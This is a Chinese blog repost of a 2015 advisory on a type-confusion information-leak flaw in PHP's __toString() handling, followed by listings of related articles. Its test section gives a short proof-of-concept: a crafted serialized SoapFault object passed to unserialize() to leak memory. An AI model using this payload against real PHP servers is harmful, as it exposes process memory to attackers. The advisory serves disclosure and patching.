mysql tostring函数_PHP '__toString()'函数类型混淆信息泄露漏洞

最新推荐文章于 2024-03-29 08:00:00 发布
最新推荐文章于 2024-03-29 08:00:00 发布
阅读量175 收藏
点赞数
文章标签: mysql tostring函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28309723/article/details/113435549
版权

PHP '__toString()'函数类型混淆信息泄露漏洞

发布日期:2015-05-13

更新日期:2015-05-13

受影响系统:

PHP PHP

描述:

BUGTRAQ  ID: 74417

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP在'__toString()'函数的实现上存在类型混淆漏洞,攻击者利用此漏洞可获取漏洞信息。

*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Taoguang Chen ()提供了如下测试方法:

<?php

$data =

'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}';

echo unserialize($data);

?>

建议:

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net/downloads.php

PHP 的详细介绍:请点这里

PHP 的下载地址:请点这里

0b1331709591d260c1c78e86d0c51c18.png

多特姚
关注
PHP WebShell 免杀
悦分享
08-01 6133
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1456
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
mysql tostring函数_各种类型转换为字符串类型(ToString())
weixin_32918953的博客
02-17 4564
// C# 日期格式DateTimedt=DateTime.Now;dt.ToString();//2005-11-5 13:21:25dt.ToFileTime().ToString();//127756416859912816dt.ToFileTimeUtc().ToString();//127756704859912816dt.ToLocalTime().ToString();//20...
mysql tostring函数_javascript中toString()方法的用法?
weixin_30491017的博客
02-07 1286
展开全部1、Array.toString():将数组转换成一个字符串,并且返回这个字符串。636f707962616964757a686964616f31333335343965描述:当数组用于字符串环境中时,javascript会调用这一方法将数组自动转换成一个字符串。toString()在把数组转换成字符串时,首先要将数组的每个元素都转换成字符串(通过调用这些元素的toString方法)。当每...
关于toString()、string.valueOf()、""三种转换字符串方式的比较及mysql中空字段的转换
Java旅途
05-08 2008
一、关于三种方式的效率问题在此就不做过多的讨论了。toString()>String.valueOf()>""。在执行效率上toSting()是最快的。 二、关于“”和null能使用哪种方式进行转换字符串及转换后是什么? 1.首先来看“”的转换 public static void main(String[] args) { System.out.prin...
随手.toString()带来的一个毁灭性灾难
weixin_39309402的博客
04-02 288
生产有一个项目需要进行一点点改动,因为改动不大,所以他便没在测试环境进行测试,因为测试环境测试比较麻烦,而且生产这个改动就是针对model增加一个字段,然后某个分支进行赋值,操作起来比较简单,所以就进行改造了。 不出意外的,项目gg了,他怎么也想不到,出错的地方,就是因为他的1个随后.toString(),我们举个列子: public class EcfnPay { String name;...
mysqltostring_jdbc-mysql基础 util.date 和 sql.date 的toString方法是不同的
weixin_36212762的博客
02-02 373
礼悟:好好学习多思考,尊师重道存感恩。叶见寻根三二一,江河湖海同一体。虚怀若谷良心主,愿行无悔给最苦。读书锻炼强身心,诚劝且行且珍惜。javaSE:8os:windows7 x64ide:MyEclipse 2017代码package com.jizuiku.jdbc;/***** @author 给最苦* @version V17.11.08*/public class UtilDateToSq...
php混淆知识
是日已过,命亦随减的博客
04-25 411
1、include 和 require 都能把另外一个文件包含到当前文件中 他们有什么区别?include 和 include_once 又有什么区别? 二者区别只有一个,那就是对包含文件的需求程度 include 就是包含,如果被包含的文件不存在的话, 那么则会提示一个错误,但是程序会继续执行下去。 require 意思是需要,如果被包含文件不存在或者 无法打开的时候,则会提示错误,并且会终止程...
我在MySql中存储和检索正确的日期/时间时遇到问题
04-04
你可以使用` CONVERT_TZ()`函数MySQL中进行时区转换,或者在C#代码中进行相应的调整。 在编程时,确保使用参数化查询以防止SQL注入攻击,同时使用try-catch语句处理可能出现的异常,比如日期格式不正确或超出范围...
读书笔记:PHPMySQL高性能应用开发 (2019.2.20-2019.3.4)
通往架构师的成长学习之路
03-04 775
1.emtpy、isset、is_null的区别 isset()检测一个变量是否已声明且值不为NULL,并且声名一个变量没有赋值也算false,但是空字符串或者空格为true empty()用来检测一个变量是否为空,当变量为空字符串、false、空数组、null、0、‘’以及被unset删除后的变量 is_null()判断变量内容是否是null,是isset()函数的反函数,区别是i...
ToString()和Convert.ToString()的用法区别
07-03
C#中,string 是 System.String 的别名,所以基本上在使用时是没有差别的。
mysql常见string相关函数
wodamazi
11-15 173
ASCII (str) 参数为string,返回最左侧字节的ascii码。String值为0返回0,为NULL返回NULL mysql&gt; SELECT ASCII('0'); -&gt; 48 mysql&gt; SELECT ASCII(0); -&gt; 48 mysql&gt; SELECT ASCII('d'); -&gt; 100 BIN (N) 参数为bi...
PHP反序列化漏洞
weixin_43610673的博客
02-26 906
序列化与反序列: 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 其实就是将数据转化成一种可逆的数据结构,反序列化就是其逆向的过程。 序列化的目的是方便数据的传输和存储。 在PHP应用中,序列化和反序列化一般用做缓存,比如sessio.........
MySQL——字符串函数
热门推荐
冷秋魂的专栏
04-01 2万+
对于针对字符串位置的操作,第一个位置被标记为1。 ASCII(str) 返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL。 mysql> select ASCII(2);-> 50mysql> select ASCII(2);-> 50mysql> select ASCII(dx);-> 100也可参见ORD()函数。 O
PHP反序列化漏洞学习
qq_62078839的博客
07-14 393
序列化是将变量转换为可保存或传输的字符串的过程,反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。序列化:反序列化: 例如: 输出的结果为: 在序列化后的结果中的字母标识为: 在这个代码中运用到了 __construct()魔术方法序列化魔术方法这里拿PIKACHU靶场一题来举例 这里给了一个例子我们看看源码 这里并没有出现什么危险函数但construct析构函数中有个打印字符串的函数我们可以利用XSS漏洞弹个窗......
PHP反序列化漏洞总结
u013797594的博客
06-11 2547
PHP反序列化漏洞总结
MySQL
m0_62381101的博客
09-22 147
MySQL Workbench中,可以选择要备份的数据库,然后选择“备份”选项,设置备份文件的保存路径和其他选项,最后点击“开始备份”按钮。这些工具提供了更高级的备份功能,如增量备份、并行备份等。需要注意的是,修改`lower_case_table_names`参数的值可能会对现有的数据库和表产生影响,因此在进行修改之前,应该仔细考虑和备份相关数据。其中,``和``是登录MySQL的用户名和密码,``是要备份的数据库名,``是备份文件的保存路径。
详细分析Mysql中的STR_TO_DATE基本知识(全)
最新发布
码农研究僧的博客
03-29 1万+
STR_TO_DATE是MySQL中的一个日期时间处理函数,用于将字符串转换为日期时间类型。 它的基本用法是将一个包含日期时间信息的字符串转换为对应的日期时间类型
MySQL优化原理
toString的博客
05-02 3993
说起MySQL的查询优化,相信大家收藏了一堆奇淫技巧:不能使用SELECT *、不使用NULL字段、合理创建索引、为字段选择合适的数据类型..... 你是否真的理解这些优化技巧?是否理解其背后的工作原理?在实际场景下性能真有提升吗?我想未必。因而理解这些优化建议背后的原理就尤为重要,希望本文能让你重新审视这些优化建议,并在实际业务场景下合理的运用。 MySQL逻辑架构 如果能在头脑中构建一
PHP魔术函数详解:__construct、__destruct等
"这篇文档详细介绍了PHP中的魔术函数,这些函数以双下划线`__`开头,会在特定情况下自动触发。文档列举了多个魔术函数的用途,包括`__construct()`、`__destruct()`、`__get()`、`__set()`、`__isset()`、`__unset()...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值